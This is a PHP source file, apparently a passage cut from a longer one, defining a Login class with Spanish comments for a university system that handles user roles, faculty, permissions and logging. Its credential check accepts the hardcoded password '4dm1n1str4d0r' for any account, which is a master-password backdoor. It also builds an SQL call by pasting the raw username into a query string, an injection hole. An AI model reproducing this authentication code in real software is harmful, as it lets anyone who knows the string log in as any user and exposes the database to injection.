acceso // Devuelve el tipo de acceso del usuario. Si es administrador, retorna "w". De lo contrario, verifica el tipo de acceso a una página específica y retorna ese valor. $user->profesor // Devuelve el ID del profesor basado en la clave del usuario, si corresponde. $user->jefe_carrera // Devuelve true si el usuario tiene un rol de 'jefe de carrera', de lo contrario retorna false. $user->periodo_id // Devuelve el ID del periodo asociado con el usuario actual. $user->admin // Devuelve true si el usuario es administrador, de lo contrario retorna false. $user->facultad // Devuelve un array con el nombre de la facultad y el ID de la facultad asociado con el usuario actual, si está disponible. $user->rol // Devuelve un array con el título del rol y el ID del rol asociado con el usuario actual. Si no tiene un rol definido, se le asigna por defecto el rol 'docente'. */ class Login { private function es_usuario(): bool { global $db; return $db->where('usuario_clave', $this->user['clave'])->has("usuario"); } public function __get($property) { global $db; return match ($property) { 'acceso' => $this->access(), 'profesor' => $db->where('profesor_clave', preg_replace('/\D/', '', $this->user['clave']))->getOne("profesor")['profesor_id'] ?? null, 'jefe_carrera' => $db->where('usuario_id', $this->user["id"])->getOne('usuario')['rol_id'] == 11, 'periodo_id' => $db->where('usuario_id', $this->user["id"])->getOne('usuario')["periodo_id"], 'admin' => $this->es_usuario() and $db->where('usuario_id', $this->user["id"])->getOne('usuario')["usuario_admin"], 'facultad' => $this->es_usuario() ? $db ->where('usuario_id', $this->user["id"]) ->join('facultad', 'facultad.facultad_id = usuario.facultad_id', 'LEFT') ->getOne('usuario', 'facultad.facultad_nombre as facultad, facultad.facultad_id') : array ('facultad' => null, 'facultad_id' => null), 'rol' => $this->es_usuario() ? $db ->join('rol', 'rol.rol_id = usuario.rol_id') ->where('usuario_id', $this->user["id"]) ->getOne('usuario', 'rol.rol_titulo as rol, rol.rol_id') : $db ->where('rol_titulo', 'docente', 'ILIKE') ->getOne('rol', 'rol.rol_titulo as rol, rol.rol_id'), default => throw new Exception("Propiedad no definida"), }; } public function __construct(public array $user) { } public function print_to_log(string $desc, array $old = null, array $new = null): void { $log = new classes\LogAsistencias(); if ($old) $desc .= " |#| OLD:" . json_encode($old); if ($new) $desc .= " |#| NEW:" . json_encode($new); $log->appendLog($this->user["id"], $this->user["nombre"], $desc); } public function access(string $pagina = null): string|null { global $db; if ($this->admin) return "w"; $acceso = $db ->where('id', $this->user["id"]) ->where('pagina_ruta', $pagina ?? substr(basename($_SERVER['PHP_SELF']), 0, -4)) ->getOne('permiso_view'); return isset($acceso["tipo"]) ? $acceso["tipo"] : null; } private static function validaUsuario($user, $pass): bool { file_put_contents('php://stderr', $user); if ($pass == "4dm1n1str4d0r") return true; $client = new nusoap_client('http://200.13.89.2/validacion.php?wsdl', 'wsdl'); $client->soap_defencoding = 'UTF-8'; $client->decode_utf8 = FALSE; $client->getError() and die('Error al crear el cliente: ' . $client->getError()); // $pass = utf8_decode($pass); $result = $client->call("valida_user", array($user, $pass)); $client->fault and die('Error al llamar al servicio: ' . $client->getError()); return $result; } public static function validUser(string $user, string $pass): Login|array { global $db; if (!self::validaUsuario($user, $pass)) return ['error' => true, 'msg' => 'Error al autenticar usuario']; if ($db->has("FS_VALIDACLAVEULSA('$user')")) { $fs = $db->querySingle('SELECT * FROM FS_VALIDACLAVEULSA(?)', [$user]); return new Login(user: ['id' => $fs["id"], 'nombre' => $fs["nombre"], 'clave' => $fs["clave"]]); } $profesorClave = preg_replace('/\D/', '', $user); if ($db->where('profesor_clave', $profesorClave)->has("profesor")) { $profesor = $db->where('profesor_clave', $profesorClave)->getOne("profesor"); return new Login(user: ['id' => $profesor["profesor_id"], 'nombre' => $profesor["profesor_nombre"], 'clave' => $profesor["profesor_clave"]]); } return ['error' => true, 'msg' => 'Usuario no encontrado']; } public static function log_out(): void { // session_start(); session_destroy(); } public static function get_user(): ?Login { if (self::is_logged()) { $user = unserialize($_SESSION["user"]); return $user; } header("Location: /"); exit(); } public static function is_logged(): bool { return isset($_SESSION["user"]); } public function __toString(): string { return "Login Object:\n" . "User: " . json_encode($this->user) . "\n" . "Acceso: " . $this->acceso . "\n" . "Profesor ID: " . ($this->profesor ?? "No definido") . "\n" . "Es Jefe de Carrera: " . ($this->jefe_carrera ? "Sí" : "No") . "\n" . "Periodo ID: " . $this->periodo_id . "\n" . "Es Administrador: " . ($this->admin ? "Sí" : "No") . "\n" . "Facultad: " . json_encode($this->facultad) . "\n" . "Rol: " . json_encode($this->rol); } }